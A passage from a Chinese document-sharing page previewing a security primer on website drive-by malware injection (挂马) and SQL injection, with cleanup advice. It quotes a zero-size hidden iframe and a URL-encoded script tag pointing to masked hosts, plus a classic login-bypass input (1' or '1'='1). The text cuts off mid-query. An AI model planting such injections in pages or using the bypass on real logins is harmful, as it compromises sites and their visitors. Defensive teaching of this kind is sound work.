网站挂马.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网站挂马

挂马攻击 挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。 挂马方式 目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码: iframe src=http://www.cq***.com/Img/ width=0 height=0/iframe 这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。 script src=http://%68%68%6A%32***%63%6E/script 这里Script里的URL是经过URL encode编码的。通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。 除了这两种常见的挂马方式外,还有如下几种: 利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。 利用网页跳转、弹出新窗口等方式进行挂马。 利用Flash等媒体封装的方式进行挂马。 在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。 挂马常见类型 常见的几种类型如下: 数据库挂马 攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。 文件挂马 攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。 ARP挂马 在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。这样的攻击方式在客户端上也可能发生,比如用户所在的局域网有ARP病毒,那么用户请求的所有网站都有可能被注入挂马代码。 服务端配置文件挂马 比如IIS里的文件重定向、启用文档页脚、修改IIS映射等挂马。这类挂马比较隐蔽,也是挂马常用的技巧。 XSS挂马 利用XSS跨站脚本漏洞,将挂马代码注入到客户端页面以达到挂马的目的。 挂马危害 网站被挂马不仅严重影响到了网站的公众信誉度,还可能对访问该网站的用户计算机造成很大的破坏。 一般情况下,攻击者挂马的目的只有一个:利益。如果用户访问被挂网站时,用户计算机就有可能被植入病毒,这些病毒会偷盗各类账号密码,如网银账户、游戏账号、邮箱账号、QQ及MSN账号等。植入的病毒还可能破坏用户的本地数据,从而给用户带来巨大的损失,甚至让用户计算机沦为僵尸网络中的一员。 网站被挂马的解决方案 对于网站被挂马,建议如下: 通过上面介绍的“挂马常见类型”迅速分析定位网站被挂马的原因。 数据库挂马:及时恢复数据库或者利用嵌入的挂马代码,搜索数据库,定位到挂马代码所在的字段值并清除。 文件挂马:使用工具或者命令遍历网站所有文本文件,批量清除挂马代码。 ARP挂马:查找出局域网中的ARP病毒源头,清除病毒,并将相应计算机进行安全加固或重新安装系统。 服务端配置文件挂马:如果上述的方法找不到挂马代码时,就应该查找网站服务端配置文件是否存在异常,并恢复。 XSS挂马:这类挂马使用不广泛,修补网站的XSS漏洞即可解决问题。 及时检测并修补网站本身以及网站所在服务端环境的各类漏洞,从而在根源上降低消除网站被挂马的风险。 SQL注入攻击漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,是发生在应用程序的数据库层上的安全漏洞。在设计不良的程序当中,忽略了对输入字符串中夹带的SQL指令的检查,那么这些夹带进去的指令就会被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。 SQL注入实例 某网站的登录页面如下: 页面表单提交时,将用户名赋予变量v_user,将密码赋予变量v_pass。 假定该登录页面后台身份验证代码为: “select * from user where user_name=’” + v_user + “’ and password=’” + v_pass + ”’;” 如果输入:用户名:admin,密码:123456 则数据库执行的查询语句为: select * from user where user_name=’admin’ and password=’123456’; 一切均正常。但如果用户恶意输入使得: v_user=”admin” v_pass=”1’ or ‘1’=’1” 此时认证SQL语句变成了: select * fro

文档评论(0)

sb9185sb + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档